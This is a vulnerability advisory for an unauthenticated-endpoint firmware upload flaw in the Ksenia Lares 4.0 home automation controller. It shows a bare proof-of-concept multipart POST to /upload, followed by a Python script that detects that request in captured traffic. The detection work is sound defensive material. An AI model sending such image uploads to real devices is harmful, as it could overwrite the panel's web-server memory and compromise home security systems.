# Exploit Title: Ksenia Security Lares 4.0 Home Automation Remote Code Execution
# Google Dork: N/A
# Date: 31 March 2025
# Exploit Author: Mencha 'ShadeLock' Isajlovska
# Vendor Homepage: https://www.kseniasecurity.com/en/
# Software Link: https://www.kseniasecurity.com/en/company/why-lares-4-0.html
# Version: Lares 4.0
# Tested on: Ksenia Lares Webserver
# CVE : N/A
# Desc: The device provides access to an unprotected endpoint, enabling the upload of MPFS File System binary images. Authenticated attackers can exploit this vulnerability to overwrite the flash program memory containing the web server's main interfaces, potentially leading to arbitrary code execution.

POST /upload HTTP/1.1
Host: 192.168.1.2

------WebKitFormBoundary5GYWB4nichZAk7BS
Content-Disposition: form-data; name="i"; filename="MPFSImage.bin"
Content-Type: application/octet-stream

------WebKitFormBoundary5GYWB4nichZAk7BS--
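
For monitoring, the request above reduces to three observable traits: method POST, path /upload, and a multipart file part in form field "i". The following detection sketch is an added example, not part of the original advisory or vendor code; it assumes raw requests are available from a proxy or packet capture, and the function names, sample hosts and sample traffic are constructed for illustration.

```python
import re

# Indicators taken from the request in the advisory: POST /upload, form field "i".
UPLOAD_PATH = "/upload"
FORM_FIELD = b"i"

# Matches a multipart part header that carries a file (filename= present).
_FILE_PART = re.compile(
    rb'^Content-Disposition:\s*form-data;\s*name="([^"]*)";\s*filename="([^"]*)"',
    re.IGNORECASE | re.MULTILINE,
)


def inspect_request(raw: bytes):
    """Return a finding dict if raw is a file upload to /upload, else None."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].decode("latin-1").split()
    if len(parts) != 3:
        return None  # malformed request line
    method, target, _version = parts
    path = target.split("?", 1)[0].rstrip("/")  # ignore query string, trailing slash
    if method.upper() != "POST" or path != UPLOAD_PATH:
        return None
    for name, filename in _FILE_PART.findall(body):
        if name == FORM_FIELD:
            return {"path": path, "filename": filename.decode("latin-1")}
    return None


def scan(captures):
    """captures: iterable of (source_ip, raw_request). Returns a list of alerts."""
    alerts = []
    for source_ip, raw in captures:
        finding = inspect_request(raw)
        if finding:
            alerts.append({"source": source_ip, **finding})
    return alerts


# Constructed sample captures (not real traffic).
_BOUNDARY = b"----ConstructedBoundary"
SAMPLES = [
    ("10.0.0.5", b"GET /index.html HTTP/1.1\r\nHost: panel.example\r\n\r\n"),
    ("10.0.0.7", b"POST /upload?x=1 HTTP/1.1\r\nHost: panel.example\r\n\r\n--" + _BOUNDARY
     + b'\r\nContent-Disposition: form-data; name="i"; filename="image.bin"\r\n'
     b"Content-Type: application/octet-stream\r\n\r\n\x00\x01\r\n--" + _BOUNDARY + b"--\r\n"),
    ("10.0.0.9", b"POST /login HTTP/1.1\r\nHost: panel.example\r\n\r\nuser=a"),
]
print(scan(SAMPLES))
```

Any alert from a source outside the expected maintenance hosts, or outside a planned update window, is worth correlating with the panel's own authentication log.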